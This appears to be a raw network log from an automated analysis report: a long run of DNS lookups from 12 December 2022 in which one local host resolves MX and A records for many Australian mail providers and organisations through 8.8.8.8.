                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.856834888 CET8.8.8.8192.168.2.30x903bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.856834888 CET8.8.8.8192.168.2.30x903bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.925395966 CET8.8.8.8192.168.2.30xe372No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.931093931 CET8.8.8.8192.168.2.30xc141No error (0)westpac-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.931093931 CET8.8.8.8192.168.2.30xc141No error (0)westpac-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.097254992 CET8.8.8.8192.168.2.30x4416No error (0)euar.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.110234976 CET8.8.8.8192.168.2.30x7b52No error (0)smx3.beagle.com.au69.60.120.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.303828001 CET8.8.8.8192.168.2.30xc26dNo error (0)filter.au.ds.network103.68.165.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.326081038 CET8.8.8.8192.168.2.30xfd1No error (0)comcen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.326081038 CET8.8.8.8192.168.2.30xfd1No error (0)comcen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.326081038 CET8.8.8.8192.168.2.30xfd1No error (0)comcen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.219753981 CET8.8.8.8192.168.2.30xda30No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.219753981 CET8.8.8.8192.168.2.30xda30No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.219753981 CET8.8.8.8192.168.2.30xda30No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.229058027 CET8.8.8.8192.168.2.30x75a8No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.334247112 CET8.8.8.8192.168.2.30xd843No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.334247112 CET8.8.8.8192.168.2.30xd843No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.340910912 CET8.8.8.8192.168.2.30x3634No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.385946989 CET8.8.8.8192.168.2.30xa56No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.446357012 CET8.8.8.8192.168.2.30x71bbNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.446357012 CET8.8.8.8192.168.2.30x71bbNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.561014891 CET8.8.8.8192.168.2.30x1392No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.561014891 CET8.8.8.8192.168.2.30x1392No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.561014891 CET8.8.8.8192.168.2.30x1392No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.581469059 CET8.8.8.8192.168.2.30xfd81No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.613338947 CET8.8.8.8192.168.2.30x68b1No error (0)mx1.spintel.net.au203.29.125.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.620836020 CET8.8.8.8192.168.2.30xa107No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.620836020 CET8.8.8.8192.168.2.30xa107No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.641860008 CET8.8.8.8192.168.2.30x15f6No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.742059946 CET8.8.8.8192.168.2.30xf0d8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.742059946 CET8.8.8.8192.168.2.30xf0d8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.742059946 CET8.8.8.8192.168.2.30xf0d8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.776889086 CET8.8.8.8192.168.2.30x6732No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.857898951 CET8.8.8.8192.168.2.30xdfd2No error (0)officelink.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.857898951 CET8.8.8.8192.168.2.30xdfd2No error (0)officelink.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.012882948 CET8.8.8.8192.168.2.30xf7aaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.012882948 CET8.8.8.8192.168.2.30xf7aaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.012882948 CET8.8.8.8192.168.2.30xf7aaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.037894964 CET8.8.8.8192.168.2.30xd446No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.153551102 CET8.8.8.8192.168.2.30x4421Name error (3)rosehillcrest.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.205178022 CET8.8.8.8192.168.2.30x53adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.205178022 CET8.8.8.8192.168.2.30x53adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.205178022 CET8.8.8.8192.168.2.30x53adNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.229171038 CET8.8.8.8192.168.2.30x509No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.298454046 CET8.8.8.8192.168.2.30x5acfNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.325845003 CET8.8.8.8192.168.2.30x79acNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.348980904 CET8.8.8.8192.168.2.30xa66dNo error (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.348980904 CET8.8.8.8192.168.2.30xa66dNo error (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.367908955 CET8.8.8.8192.168.2.30x28bNo error (0)mx1.hc86-32.ap.iphmx.com139.138.29.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.367908955 CET8.8.8.8192.168.2.30x28bNo error (0)mx1.hc86-32.ap.iphmx.com139.138.31.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.395955086 CET8.8.8.8192.168.2.30x17dfNo error (0)mailgw1.cbr.officelink.net.au203.14.230.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.444328070 CET8.8.8.8192.168.2.30x8efbNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.444328070 CET8.8.8.8192.168.2.30x8efbNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.462693930 CET8.8.8.8192.168.2.30xd6d8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.528353930 CET8.8.8.8192.168.2.30xa9a6No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.557795048 CET8.8.8.8192.168.2.30x4c6aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.605400085 CET8.8.8.8192.168.2.30xd618No error (0)msn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.681237936 CET8.8.8.8192.168.2.30x1f4aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.681237936 CET8.8.8.8192.168.2.30x1f4aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.681237936 CET8.8.8.8192.168.2.30x1f4aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.701437950 CET8.8.8.8192.168.2.30xbb20No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.774003983 CET8.8.8.8192.168.2.30x99c7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.774003983 CET8.8.8.8192.168.2.30x99c7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.774003983 CET8.8.8.8192.168.2.30x99c7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.797147989 CET8.8.8.8192.168.2.30xb0dNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.901485920 CET8.8.8.8192.168.2.30x18bfNo error (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.901485920 CET8.8.8.8192.168.2.30x18bfNo error (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.901485920 CET8.8.8.8192.168.2.30x18bfNo error (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.901485920 CET8.8.8.8192.168.2.30x18bfNo error (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.901485920 CET8.8.8.8192.168.2.30x18bfNo error (0)tyndale.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.921610117 CET8.8.8.8192.168.2.30x4f27No error (0)extmail.msn.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.921610117 CET8.8.8.8192.168.2.30x4f27No error (0)extmail.msn.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.939292908 CET8.8.8.8192.168.2.30xd09dNo error (0)ASPMX2.GOOGLEMAIL.COM142.250.150.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.958306074 CET8.8.8.8192.168.2.30x43fdNo error (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.958306074 CET8.8.8.8192.168.2.30x43fdNo error (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.995210886 CET8.8.8.8192.168.2.30xaa55No error (0)mx1-us1.ppe-hosted.com67.231.154.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.995210886 CET8.8.8.8192.168.2.30xaa55No error (0)mx1-us1.ppe-hosted.com148.163.129.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.024882078 CET8.8.8.8192.168.2.30x8764No error (0)iimetro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.046299934 CET8.8.8.8192.168.2.30x3e12No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.213114977 CET8.8.8.8192.168.2.30xb3deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.213114977 CET8.8.8.8192.168.2.30xb3deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.213114977 CET8.8.8.8192.168.2.30xb3deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.232115984 CET8.8.8.8192.168.2.30x719eNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.303946972 CET8.8.8.8192.168.2.30x4c46No error (0)amp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.336766958 CET8.8.8.8192.168.2.30x4e6fNo error (0)amp-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.336766958 CET8.8.8.8192.168.2.30x4e6fNo error (0)amp-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.372339964 CET8.8.8.8192.168.2.30xc3baNo error (0)guardian.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.372339964 CET8.8.8.8192.168.2.30xc3baNo error (0)guardian.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.372339964 CET8.8.8.8192.168.2.30xc3baNo error (0)guardian.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.416521072 CET8.8.8.8192.168.2.30xa8f7No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.416521072 CET8.8.8.8192.168.2.30xa8f7No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.459340096 CET8.8.8.8192.168.2.30x1263No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au54.66.10.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au3.24.56.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:33.527853012 CET8.8.8.8192.168.2.30xb8c3No error (0)filter1.guardi-1.mailguard.com.au20.92.134.58A (IP address)IN (0x0001)false
